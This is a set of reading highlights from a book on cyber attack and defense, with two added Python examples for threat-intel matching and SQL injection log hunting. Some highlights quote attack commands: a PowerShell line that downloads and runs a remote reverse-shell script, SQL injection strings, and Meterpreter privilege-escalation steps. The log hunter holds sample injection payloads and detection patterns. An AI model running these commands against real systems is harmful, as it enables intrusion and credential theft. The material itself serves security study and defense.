# Cybersecurity – Attack and Defense Strategies

![rw-book-cover](https://images-na.ssl-images-amazon.com/images/I/51QLAkPI2dL._SL200_.jpg)

## Metadata

- Author: [[Yuri Diogenes, Erdal Ozkaya]]
- Full Title: Cybersecurity – Attack and Defense Strategies
- Category: #books

## Highlights

- many are not prepared to handle security incidents in a cloud environment. ([Location 668](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=668))
- A confident hacker could even request network information and statistics from the IT department using the identity of a high-ranking employee. ([Location 1350](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1350))
- Humans are sympathetic, trusting of friends, show-offs, and obedient to higher authorities; they are easy to convince provided that one can bring them around to a certain way of thinking. There are six levers that social engineers use to get victims to talk. One of these is reciprocation, where a victim does something for a social media user who in turn feels the need to reciprocate the favor. It is part of human nature to feel obligated to return a favor to a person, and attackers have come to know and exploit this. Another lever is scarcity, where a social engineer will get compliance from a target by threatening a short supply of something that the target is in need of. It could be a trip, a mega sale, or a new release of products. A lot of work is done to find out a target's likes in order to enable social engineers to pull this lever. The next lever is consistency, whereby humans tend to honor promises or get used to the usual flow of events. When an organization always orders and receives IT consumables from a certain vendor, it is very easy for attackers to clone the vendor and deliver malware-infected electronics. Another lever is liking, whereby humans are more likely to comply with the requests of people they like or those that appear attractive. Social engineers are experts at making themselves sound and appear attractive to easily win the compliance of targets. A commonly used lever that has a high success rate is authority. Generally, humans are obedient to the authority of those that are ranked above them; they can therefore easily bend the rules for them and grant their wishes even if they seem malicious. ([Location 1359](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1359))
- The last lever is social validation: humans will readily comply and do something if other people are doing the same, as they do not want to appear the odd one out. All a hacker needs to do is make something appear normal and then request an unsuspicious user to do the same. ([Location 1373](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1373))
    - Tags: [[pink]]
- To get passwords, one needs to filter the data captured to show only the POST data. ([Location 1515](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1515))
    - Tags: [[pink]]
- Predictions are that unless organizations pay attention to the integrity of their data, data manipulation attacks will increase rapidly. ([Location 1715](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1715))
    - Tags: [[pink]]
- in September 2017, zero-day vulnerabilities were discovered. One of these was BlueBorne, which can take over any Bluetooth-enabled device and infect it with malware. ([Location 1756](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1756))
    - Tags: [[pink]]
- hackers can use tools, such as Shelter, to verify their phishing resources: ([Location 1830](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1830))
    - Tags: [[pink]]
- Another approach is to use specific tools to identify vulnerabilities in the code, and Checkmarx (www.checkmarx.com) is an example of that. Checkmarx can scan the code and quickly identify, categorize, and suggest countermeasures for vulnerabilities in the code. The following figure shows a screenshot of the IDA PRO tool. In the screenshot, the tool has already identified 25 SQL injection vulnerabilities and two stored XSS vulnerabilities in the supplied code: ([Location 1857](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1857))
    - Tags: [[pink]]
- This technique uses a freely available tool called Ophcrack that is used to recover Windows passwords. The tool is free to download but is as effective as the premium versions of Konboot and Hiren's boot. ([Location 1984](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1984))
    - Tags: [[pink]]
- To execute an SQL injection attack, a hacker needs to create a valid SQL script and enter it in any input field. Common examples include `" or "1"="1` and `" or "a"="a`, which fool the SQL codes running in the backend. ([Location 2025](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2025))
    - Tags: [[pink]]
- You can view more examples of XSS attacks at excess-xss.com. ([Location 2039](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2039))
    - Tags: [[pink]]
- The Security Accounts Manager (SAM) database ([Location 2207](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2207))
    - Tags: [[orange]]
- The Local Security Authority Subsystem (LSASS) process memory; the Domain Active Directory Database (domain controllers only); the Credential Manager (CredMan) store; the Local Security Authority (LSA) secrets in the registry ([Location 2208](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2208))
    - Tags: [[orange]]
- As a member of the Red Team, you may also need to pursue attacks against the hypervisor (VMWare or Hyper-V). For this type of attack, you can use PowerMemory (https://github.com/giMini/PowerMemory/) to exploit the VM's passwords.
  ([Location 2317](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2317))
    - Tags: [[pink]]
- To prevent the scan from happening, an organization can opt to have host-based intrusion detection systems, but most network administrators will not consider doing that in a network, especially if the number of hosts is huge. ([Location 2385](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2385))
    - Tags: [[pink]]
- It directly loads a PS1 file from the internet instead of downloading then loading: `PS > IEX (New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1')` ([Location 2402](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2402))
    - Tags: [[pink]]
- The following command is going to fork Netcat (https://github.com/diegocr/netcat) into a valid Windows utility called Calculator (calc.exe) and change the filename (nc.exe) to svchost.exe. This way the process name won't raise any flags since it is part of the system: If you simply use the `dir` command to list all files in this folder, you won't see the file. However, if you use the `streams` tool from Sysinternals, you will be able to see the entire name as follows: ([Location 2407](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2407))
    - Tags: [[orange]]
- `Psexec \\remotecomputername -c autorunsc.exe -accepteula` ([Location 2466](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2466))
    - Tags: [[pink]]
- Another option is to use the PowerShell utility, Nishang (https://github.com/samratashok/nishang). Just as we mentioned previously, you can also use ADS here to hide files; in this case, you can use the `Invoke-ADSBackdoor` command. ([Location 2498](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2498))
    - Tags: [[pink]]
- There are several hacking- and security-oriented PowerShell modules being used today. The most common ones are PowerSploit and Nishang. ([Location 2533](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2533))
- The main difference between WMImplant and other remote access tools such as Meterpreter is that it runs natively on a Windows system while the others have to be loaded on a computer first. ([Location 2557](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2557))
    - Tags: [[pink]]
- Scheduled tasks are not just used for timing the executions of tasks. Hackers also use them to execute tasks with SYSTEM user privileges. ([Location 2561](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2561))
    - Tags: [[pink]]
- Besides the examples that were given in Chapter 6, Chasing User's Identity, you can also use the PowerShell utility Nishang to harvest all local account password hashes with the `Get-PassHashes` command. ([Location 2582](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2582))
    - Tags: [[pink]]
- `Find-PSServiceAccounts -Forest` ([Location 2605](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2605))
    - Tags: [[pink]]
- Another approach is to attack AD by exploiting the vulnerability MS14-068 (9). Although this vulnerability is old (November 2014), it is very powerful since it allows a user with a valid domain account to obtain administrator privileges by creating a forged privilege account certificate (PAC) that contains the administrator account membership, inside a ticket request (TG_REQ) sent to the key distribution center (KDC). ([Location 2609](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2609))
    - Tags: [[pink]]
- Nessus and Nmap. After identifying the unpatched machines, hackers can search for exploits from Kali Linux that can be used to exploit them. Searchsploit will contain the corresponding exploits that can be used against unpatched computers. Once the exploits are found, the attacker will compromise the system. The attacker will then use a tool called PowerUp to bypass Windows privilege management and upgrade the user on the vulnerable machine to an admin. If the attacker wants to avoid using scanning tools to verify the current system state, including patches, it is possible to use a WMI command-line tool called `wmic` to retrieve the list of updates installed, as follows: Another option is to use the PowerShell command `Get-HotFix`: ([Location 2748](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2748))
    - Tags: [[pink]]
- Access token manipulation occurs when attackers cleverly copy access tokens from existing processes using built-in Windows API functions. They specifically target the processes that are started by admin users in a machine. ([Location 2763](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2763))
    - Tags: [[pink]]
- Metasploit also has a payload called The Cobalt Strike that also takes advantage of token stealing. ([Location 2772](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2772))
    - Tags: [[pink]]
- These features include: the magnifier, screen keyboard, display switch, and narrator. These features are conveniently placed on the Windows login screen so that they can be supportive to the user from the instant that he/she logs in. However, ([Location 2778](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2778))
    - Tags: [[pink]]
- Without admin privileges, the shims cannot modify the kernel. However, attackers have been able to create custom shims that can bypass user account control, inject DLLs into running processes, and meddle with memory addresses. These shims can enable an attacker to run their own malicious programs with elevated privileges. They can also be used to turn off security software, especially the Windows Defender. ([Location 2800](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2800))
    - Tags: [[pink]]
- For instance, rundll32.exe is used to load a custom DLL that loads a COM object that has elevated privileges. This performs file operations even in protected directories that would normally require a user to have elevated access. This opens the UAC mechanism to compromise from knowledgeable attackers. The same processes used to allow Windows programs to run unauthenticated can allow malicious software to run with admin access in the same way. Attackers can inject a malicious process into a trusted process and thereby gain the advantage of running the malicious processes with admin privileges without having to prompt a user. There are other ways that black hats have discovered that can be used to bypass UAC. There have been many methods published on GitHub that can potentially be used against UAC. One of these is eventvwr.exe, which can be compromised since it is normally auto-elevated when it runs and can, therefore, be injected with specific binary codes or scripts. ([Location 2828](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2828))
    - Tags: [[pink]]
- bypass UAC in Windows 7, you can also use the uacscript, which you can download from https://github.com/Vozzie/uacscript. ([Location 2838](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2838))
    - Tags: [[pink]]
- There has recently been a discovery of a rather sophisticated DLL injection technique called reflective DLL injection ([Location 2845](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2845))
    - Tags: [[pink]]
- classic example of that is the use of the registry key AlwaysInstallElevated, which is present in the system (set to 1) and will allow the installation of a Windows Installer package with elevated (system) privileges. For this key to be considered enabled, the following values should be set to 1: `[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001` and `[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001` ([Location 2893](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2893))
    - Tags: [[pink]]
- user consent is required and if it is not given, the privilege escalation attempt is not successful. Therefore, the attacker has to request the user to allow for the running of a legitimate program and this is where PowerShell comes in. Attackers, therefore, have to set the ask technique to be through PowerShell. This is done as follows: `Msf exploit(ask)> set TECHNIQUE PSH` and `Msf exploit(ask)> run`. At this point, a popup will appear on the target user's screen prompting them to allow the running of PowerShell, a completely legitimate Windows program. In most instances, the user will click OK. With this permission, the attacker can use PowerShell to migrate from being a normal user to a system user, as follows: `Meterpreter> migrate 1340`. Thus, 1340 is listed as a system user on Metasploit. When this is successful, the attackers will have successfully acquired more privileges. A check on the privileges the attackers have should show that they have both admin and system rights. However, the 1340 admin user only has four Windows privileges and these are insufficient to perform a big attack. An attacker has to escalate his or her privileges further so as to have sufficient privileges to be able to perform more malicious actions. The attackers can then migrate to 3772, which is an NT AUTHORITY\SYSTEM user. This can be carried out using the following command: `Meterpreter> migrate 3772` ([Location 2932](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2932))
    - Tags: [[blue]]
- If you are unsure about the current state of your security policies, you should perform an initial assessment using the PowerShell command `Get-GPOReport` to export all policies to an HTML file. Make sure that you run the following command from a domain controller: `PS C:\> Import-Module GroupPolicy` followed by `PS C:\> Get-GPOReport -All -ReportType HTML -Path .\GPO.html` ([Location 3086](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3086))
    - Tags: [[pink]]
- Another tool that you can also use to perform this assessment is the policy viewer, part of the Microsoft Security Compliance Toolkit, available at https://www.microsoft.com/en-us/download/details.aspx?id=55319: ([Location 3093](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3093))
    - Tags: [[pink]]
- To whitelist apps in an Apple OS, you can use Gatekeeper (https://support.apple.com/en-us/HT202491), and in a Linux OS you can use SELinux. ([Location 3118](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3118))
    - Tags: [[pink]]
- To optimize your deployment, you should also consider using security baselines. This can assist you in better managing not only the security aspect of the computer, but also its compliance with company policy. For the Windows platform, you can use the Microsoft Security Compliance Manager: ([Location 3123](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3123))
    - Tags: [[pink]]
- Both tools (Azure Security Center and OMS Security) are available for Windows and Linux, for VMs in Azure or Amazon AWS, and for on-premises computers. ([Location 3175](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3175))
    - Tags: [[pink]]
- The whole idea behind the defense in depth approach is to ensure that you have multiple layers of protection, and that each layer will have its own set of security controls, which will end up delaying the attack, and that the sensors available in each layer will alert you to whether or not something is happening. In other words, breaking the attack kill chain before the mission is fully executed. ([Location 3225](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3225))
    - Tags: [[pink]]
- If you are using Catalyst 4500, make sure that you enable dynamic ARP inspection. This feature protects the network from certain "man-in-the-middle" attacks. For more information about this feature, go to https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst4500/12-2/25ew/configuration/guide/conf/dynarp.html. ([Location 3300](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3300))
    - Tags: [[pink]]
- You can sign up with OpenIOC (http://openioc.org) to retrieve information regarding new IoC and also contribute to the community. By using their IoC Editor (consult the reference section for the URL to download this tool), you can create your own IoC or you can review an existing IoC. The example that follows shows the IoC Editor showing the DUQU Trojan IoC: ([Location 3453](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3453))
    - Tags: [[pink]]
- The advantage of using an open source NIPS, such as Snort, is that when a new threat is available in the wild, the community usually responds pretty fast with a new rule to detect the threat. ([Location 3509](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3509))
    - Tags: [[pink]]
- The Microsoft ATA that was used in the examples explained in the previous section requires that you use port mirroring with the domain controller (DC). ATA will have no impact on the network bandwidth since it will only be listening to the DC traffic. ([Location 3557](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3557))
    - Tags: [[pink]]
- The reason we are using Azure Security Center to monitor a hybrid environment is because the Security Center agent can be installed on a computer (Windows or Linux) on-premises, in a VM running in Azure, or in AWS. This ([Location 3574](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3574))
    - Tags: [[pink]]
- it is paramount to have a command line logging tool. ([Location 3595](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3595))
    - Tags: [[pink]]
- you can't think of threat intelligence as an IT security tool—it goes beyond that. You have to think of threat intelligence as a tool to help make decisions regarding the organization's defense, help managers to decide how they should invest in security, and help CISOs to rationalize the situation with top executives. ([Location 3689](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3689))
    - Tags: [[pink]]
- You can start consuming threat intelligence by consuming TI feeds. OPSWAT Metadefender Cloud TI feeds have a variety of options that range from free to paid versions, and they can be delivered in four different formats: JSON, CSV, RSS, and Bro. ([Location 3697](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3697))
    - Tags: [[pink]]
- Another option for a quick verification is the website https://fraudguard.io. You can perform a quick IP validation to obtain threat intel from that location. ([Location 3701](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3701))
    - Tags: [[pink]]
- You also can integrate threat intelligence feeds into your Linux system by using the Critical Stack Intel Feed (https://intel.criticalstack.com/), which integrates with The Bro Network Security Monitor (https://www.bro.org/).
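The threat-intelligence highlights above say to consume feeds in JSON or CSV and to check IP addresses against them, but not what that looks like in practice. The following is an added example, not code from the book or from any of the feed vendors named: it loads a small indicator feed in both CSV and JSON form, keeps indicators above a confidence threshold, and matches them against firewall log lines. The feed columns (`ip`, `category`, `confidence`), the iptables-style log lines and the function names are all constructed for the demo; real feeds have their own schemas, so the loaders are the part you would adapt.

```python
"""Added example (not from the book): load a threat-intel feed (CSV or JSON)
and match its IP indicators against firewall log lines.  The feed layout and
the log lines are constructed for the demo.
"""
import csv
import io
import ipaddress
import json
import re

# Constructed CSV feed.  The CIDR row shows that indicators may be ranges,
# which is why matching is done with ipaddress rather than string equality.
FEED_CSV = """ip,category,confidence
203.0.113.7,scanner,80
198.51.100.0/24,botnet_c2,60
192.0.2.44,phishing,95
"""

# The same kind of feed delivered as a JSON array of objects.
FEED_JSON = json.dumps([
    {"ip": "203.0.113.7", "category": "scanner", "confidence": 80},
    {"ip": "198.51.100.0/24", "category": "botnet_c2", "confidence": 60},
])

# Constructed iptables-style log lines (syslog prefix, then KEY=VALUE pairs).
LOG_LINES = [
    "Oct 3 10:01:02 fw kernel: IN=eth0 SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP DPT=22",
    "Oct 3 10:01:05 fw kernel: IN=eth0 SRC=10.0.0.9 DST=198.51.100.23 PROTO=TCP DPT=443",
    "Oct 3 10:01:09 fw kernel: IN=eth0 SRC=8.8.8.8 DST=10.0.0.5 PROTO=UDP DPT=53",
]

# Matches the SRC= and DST= fields; the capture group is the dotted address.
ADDR_RE = re.compile(r"\b(?:SRC|DST)=(\d{1,3}(?:\.\d{1,3}){3})")


def load_csv_feed(text: str, min_confidence: int = 0) -> list:
    """Return (network, category) pairs from a CSV feed, dropping low-confidence rows."""
    reader = csv.DictReader(io.StringIO(text))
    return [(ipaddress.ip_network(r["ip"], strict=False), r["category"])
            for r in reader if int(r["confidence"]) >= min_confidence]


def load_json_feed(text: str, min_confidence: int = 0) -> list:
    """Same as load_csv_feed, for a JSON array of {ip, category, confidence}."""
    return [(ipaddress.ip_network(r["ip"], strict=False), r["category"])
            for r in json.loads(text) if int(r["confidence"]) >= min_confidence]


def match_log(lines: list, indicators: list) -> list:
    """Return (line_number, address, category) for every logged address that
    falls inside an indicator.  Both SRC and DST are checked: a DST hit means
    an internal host is talking *to* a known-bad address, which is the more
    interesting finding for a C2 indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        for addr in ADDR_RE.findall(line):
            ip = ipaddress.ip_address(addr)
            for net, category in indicators:
                if ip in net:
                    hits.append((n, addr, category))
    return hits


if __name__ == "__main__":
    for hit in match_log(LOG_LINES, load_csv_feed(FEED_CSV)):
        print("line %d: %s matched %s" % hit)
```

Raising `min_confidence` is the usual way to keep a noisy feed from paging the on-call engineer: with the threshold at 70 only the scanner hit survives, while the low-confidence C2 range is dropped before matching.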
  ([Location 3710](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3710))
    - Tags: [[pink]]
- Visit this GitHub location for a list of free tools, including free threat intel: https://github.com/hslatman/awesome-threat-intelligence. ([Location 3715](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3715))
    - Tags: [[pink]]
- In scenarios where the incident response team is unsure about whether a specific file is malicious or not, you can also submit it for analysis at https://malwr.com. ([Location 3717](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3717))
    - Tags: [[pink]]
- The Microsoft Threat Intelligence Center, which aggregates data from: honeypots, malicious IP addresses, botnets, and malware detonation feeds; third-party sources (threat intelligence feeds); human-based observation and intelligence collection; intelligence coming from consumption of their service; intelligence feeds generated by Microsoft and third parties. Microsoft integrates the result of this threat intelligence into its products, such as Windows Defender Advanced Threat Protection, Azure Security Center, Office 365 Threat Intelligence, Cloud App Security, and others. ([Location 3745](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3745))
    - Tags: [[orange]]
- At the end of the investigation, you must answer at least the following questions: Which systems were compromised? Where did the attack start? Which user account was used to start the attack? Did it move laterally? If it did, what were the systems involved in this movement? Did it escalate privilege? If it did, which privilege account was compromised? Did it try to communicate with command and control? If it did, was it successful? If it was, did it download anything from there? If it was, did it send anything to there? Did it try to clear evidence? If it did, was it successful? ([Location 3786](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3786))
    - Tags: [[pink]]
- Open Source Threat Intelligence https://www.sans.org/summit-archives/file/summit-archive-1493741141.pdf ([Location 3823](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3823))
    - Tags: [[pink]]
- The ProcDump tool is commonly used by attackers to dump the credentials from the lsass.exe process. ([Location 3984](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3984))
    - Tags: [[pink]]
- mailing lists. The most recommendable tool for this step, which is from Symantec, provides periodic publications to the users in an organization to keep them updated about global cybersecurity incidents. ([Location 4659](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=4659))
    - Tags: [[pink]]
- The Nessus vulnerability scanner products are annual subscription-based products. Luckily, the home version is free of charge, and it also offers plenty of tools to help explore your home network. ([Location 4732](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=4732))
    - Tags: [[pink]]
- The Secunia Personal Software Inspector (PSI) is a free security tool that identifies vulnerabilities in non-Microsoft (third-party) systems. ([Location 4794](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=4794))
    - Tags: [[pink]]
- To parse Windows Prefetch files, use this Python script at //github.com/PoorBillionaire/Windows-Prefetch-Parser. ([Location 4899](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=4899))
    - Tags: [[pink]]
- When reviewing the IIS log, pay close attention to the cs-uri-query and sc-status fields. These fields will show details about the HTTP requests that were performed. If you use Log Parser, you can perform a query against the log file to quickly identify if the system experienced a SQL injection attack. Here is an example: `logparser.exe -i:iisw3c -o:Datagrid -rtp:100 "select date, time, c-ip, cs-uri-stem, cs-uri-query, time-taken, sc-status from C:\wwwlogs\W3SVCXXX\exTEST*.log where cs-uri-query like '%CAST%'"` ([Location 5001](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=5001))
    - Tags: [[pink]]
- If you are looking for a particular record, you can also use the cat command in Linux, as follows: `#cat /var/log/apache2/access.log | grep -E "CAST"`. Another alternative is to use the apache-scalp tool, which you can download from https://code.google.com/archive/p/apache-scalp. ([Location 5016](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=5016))
    - Tags: [[pink]]
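The two highlights above hunt for `CAST` with Log Parser on IIS and with `grep` on Apache. The following is an added example, not code from the book, that does the same hunt in Python for both log formats and adds the step a raw `grep` misses: it URL-decodes `cs-uri-query` (or the Apache request target) before matching, so an encoded `' OR '1'='1` is still caught, and it looks for the other usual markers (`UNION ... SELECT`, `DECLARE ... EXEC`) alongside `CAST(`. The IIS `#Fields:` order, the log lines and the pattern names are constructed for the demo.

```python
"""Added example (not from the book): hunt for SQL injection in IIS W3C and
Apache access logs.  All log lines here are constructed for the demo.
"""
import re
import urllib.parse

# Constructed IIS W3C log.  The #Fields: directive defines the column order,
# so the parser reads it rather than assuming one.
IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status time-taken
2017-09-12 10:15:01 198.51.100.4 GET /products.aspx id=17 200 31
2017-09-12 10:15:09 203.0.113.9 GET /products.aspx id=17;DECLARE%20@s%20VARCHAR(4000);SET%20@s=CAST(0x44%20AS%20VARCHAR(4000));EXEC(@s) 500 412
2017-09-12 10:15:12 203.0.113.9 GET /login.aspx user=admin%27%20OR%20%271%27%3D%271 200 58
"""

# Constructed Apache combined-format log.
APACHE_LOG = """198.51.100.4 - - [12/Sep/2017:10:16:01 +0000] "GET /item.php?id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Sep/2017:10:16:07 +0000] "GET /item.php?id=3%20UNION%20SELECT%20user,password%20FROM%20users-- HTTP/1.1" 200 2048 "-" "sqlmap/1.1"
"""

# Markers to hunt for, applied to the *decoded* query string.  First match wins.
SQLI_PATTERNS = [
    ("cast", re.compile(r"\bCAST\s*\(", re.I)),
    ("union_select", re.compile(r"\bUNION\b.{0,40}\bSELECT\b", re.I)),
    ("tautology", re.compile(r"""['"]\s*OR\s*['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I)),
    ("declare_exec", re.compile(r"\bDECLARE\b.*\bEXEC\b", re.I | re.S)),
]


def parse_iis(text: str) -> list:
    """Yield (c-ip, cs-uri-stem, cs-uri-query, sc-status) tuples from a W3C log."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            rows.append(dict(zip(fields, line.split())))
    return [(r["c-ip"], r["cs-uri-stem"], r["cs-uri-query"], r["sc-status"]) for r in rows]


# client, ident, user, [timestamp], "METHOD target proto", status ...
APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_apache(text: str) -> list:
    """Same tuple shape as parse_iis, from an Apache common/combined log."""
    out = []
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        out.append((ip, path, query, status))
    return out


def hunt(records: list) -> list:
    """Return one dict per request whose decoded query matches a SQLi marker."""
    hits = []
    for ip, path, query, status in records:
        decoded = urllib.parse.unquote_plus(query)   # %27 -> ', + and %20 -> space
        for name, rx in SQLI_PATTERNS:
            if rx.search(decoded):
                hits.append({"c-ip": ip, "uri": path, "status": status, "pattern": name})
                break
    return hits


if __name__ == "__main__":
    for h in hunt(parse_iis(IIS_LOG)) + hunt(parse_apache(APACHE_LOG)):
        print(h)
```

The `sc-status` value is carried through on purpose: a burst of 500s from one client on a single `cs-uri-stem`, as in the second IIS line, is the error-based probing that usually precedes a working injection, and it is worth alerting on even when no pattern matches.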